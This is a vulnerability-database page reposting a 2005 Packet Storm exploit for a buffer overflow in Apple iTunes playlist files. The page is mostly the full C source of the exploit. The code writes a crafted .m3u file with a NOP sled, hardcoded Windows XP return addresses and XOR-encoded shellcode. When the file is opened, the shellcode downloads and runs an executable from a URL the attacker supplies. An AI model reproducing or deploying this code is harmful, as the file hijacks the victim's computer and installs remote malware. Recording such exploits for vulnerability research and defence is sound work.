Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

itunesPLS.txt

🗓️ 16 Jan 2005 00:00:00Reported by ATmaCAType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 20 Views

Apple iTunes Playlist Buffer Overflow Exploit for versions up to 4.7, affecting Windows XP users.

Code
`/*  
*  
* Apple iTunes Playlist Buffer Overflow Download Shellcoded Exploit  
* Bug discoveried by iDEFENSE Security (http://www.idefense.com)  
* Exploit coded By ATmaCA  
* Copyright ©2002-2005 AtmacaSoft Inc. All Rights Reserved.  
* Web: http://www.atmacasoft.com  
* E-Mail: [email protected]  
* Credit to xT and delikon  
* Usage:exploit <Target> <OutputPath> <Url>  
* Targets:  
* 1 - WinXP SP1 english - kernel32.dll push eax - ret [0x77E6532A]  
* 2 - WinXP SP2 english - kernel32.dll push eax - ret [0x7C80BCB0]  
* Example:exploit 1 vuln.m3u http://www.atmacasoft.com/exp/msg.exe  
*  
*/  
  
/*  
*  
* Up to iTunes version 4.7 are affected  
* Tested with iTunes v4.7 on WinXp Sp2 english platform  
*  
*/  
  
#include <stdio.h>  
#include <stdlib.h>  
#include <conio.h>  
#include <string.h>  
  
  
#ifdef __BORLANDC__  
#include <mem.h>  
#endif  
  
#define NOP 0x90  
  
/* (*.m3u) playlist header */  
char m3u_playlist_header[] = "http://";  
  
/* Generic win32 http download shellcode  
xored with 0x1d by delikon (http://delikon.de/) */  
char shellcode[] = "\xEB"  
"\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\x1D\x40\xE2\xFA\xEB\x05\xE8\xEB\xFF"  
"\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\x1D\x1D\x94\xDE\x4D\x75\x93\x53\x13"  
"\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\x73\x4C\x75\x68\x6F\x71\x70\x49\xE2"  
"\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\x1D\x2C\xD4\x4C\x4C\x90\x2A\x4B\x90"  
"\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\x13\xF5\x30\x1D\x1D\x1D\x4C\x4A\xE2"  
"\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\x6E\xF5\x04\x1D\x1D\x1D\xE2\xCD\x48"  
"\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\x6D\x01\xB0\x96\x75\x15\x94\xF5\x43"  
"\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\x58\x21\x96\x49\x18\x65\x1C\xF7\x96"  
"\x57\x05\x96\x47\x3D\x1C\xF6\xFE\x28\x54\x96\x29\x96\x1C\xF3\x2C\xE2\xE1\x2C\xDD"  
"\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\xEF\x26\x61\x39\x09\x68\xFC\x96\x47"  
"\x39\x1C\xF6\x7B\x96\x11\x56\x96\x47\x01\x1C\xF6\x96\x19\x96\x1C\xF5\xF4\x1F\x1D"  
"\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\xF5\x32\xE2\xE2\xE2\x70\x75\x75\x33"  
"\x78\x65\x78\x1D";  
  
char *target[]= //return addr - EIP  
{  
"\x2A\x53\xE6\x77", //push eax - kernel32.dll - WinXP Sp1 english  
"\xB0\xBC\x80\x7C" //push eax - kernel32.dll - WinXP Sp2 english  
};  
  
FILE *di;  
int targetnum;  
int i = 0;  
short int weblength;  
  
char *web;  
  
char *pointer = NULL;  
char *newshellcode;  
  
/*xor cryptor*/  
char *Sifrele(char *Name1)  
{  
char *Name=Name1;  
char xor=0x1d;  
int Size=strlen(Name);  
for(i=0;i<Size;i++)  
Name[i]=Name[i]^xor;  
return Name;  
}  
  
  
void main(int argc, char *argv[])  
{  
  
if (argc < 4)  
{  
printf("Apple iTunes Playlist Buffer Overflow Download Shellcoded Exploit\n");  
printf("Bug discoveried by iDEFENSE Security (http://www.idefense.com)\n");  
printf("Exploit coded By ATmaCA\n");  
printf("Copyright ©2002-2005 AtmacaSoft Inc. All Rights Reserved.\n");  
printf("Web: http://www.atmacasoft.com\n");  
printf("E-Mail: [email protected]\n");  
printf("Credit to xT and delikon\n\n");  
printf("\tUsage:exploit <Target> <OutputPath> <Url>\n");  
printf("\tTargets:\n");  
printf("\t1 - WinXP SP1 english - kernel32.dll push eax - ret [0x77E6532A]\n");  
printf("\t2 - WinXP SP2 english - kernel32.dll push eax - ret [0x7C80BCB0]\n");  
printf("\tExample:exploit 1 vuln.m3u http://www.atmacasoft.com/exp/msg.exe\n");  
  
return;  
}  
  
  
targetnum = atoi(argv[1]) - 1;  
web = argv[3];  
  
if( (di=fopen(argv[2],"wb")) == NULL )  
{  
printf("Error opening file!\n");  
return;  
}  
for(i=0;i<sizeof(m3u_playlist_header)-1;i++)  
fputc(m3u_playlist_header[i],di);  
  
/*stuff in a couple of NOPs*/  
for(i=0;i<3045;i++)  
fputc(NOP,di);  
  
/*Overwriting the return address (EIP) with push eax address*/  
/*located somewhere in process space*/  
fprintf(di,"%s",target[targetnum]); // - ret  
  
for(i=0;i<50;i++) //NOPs  
fputc(NOP,di);  
  
  
weblength=(short int)0xff22;  
pointer=strstr(shellcode,"\x22\xff");  
weblength-=strlen(web)+1;  
memcpy(pointer,&weblength,2);  
newshellcode = new char[sizeof(shellcode)+strlen(web)+1];  
strcpy(newshellcode,shellcode);  
strcat(newshellcode,Sifrele(web));  
strcat(newshellcode,"\x1d");  
  
  
for(i=0;i<strlen(newshellcode);i++)  
fputc(newshellcode[i],di);  
  
//for(i=0;i<50;i++) //NOPs  
//fputc(NOP,di);  
  
printf("Vulnarable m3u file %s has been generated!\n",argv[2]);  
  
fclose(di);  
}  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Jan 2005 00:00Current
7.4High risk
Vulners AI Score7.4
apple itunesbuffer overflowexploitwindows xpsecurity vulnerabilityshellcode
20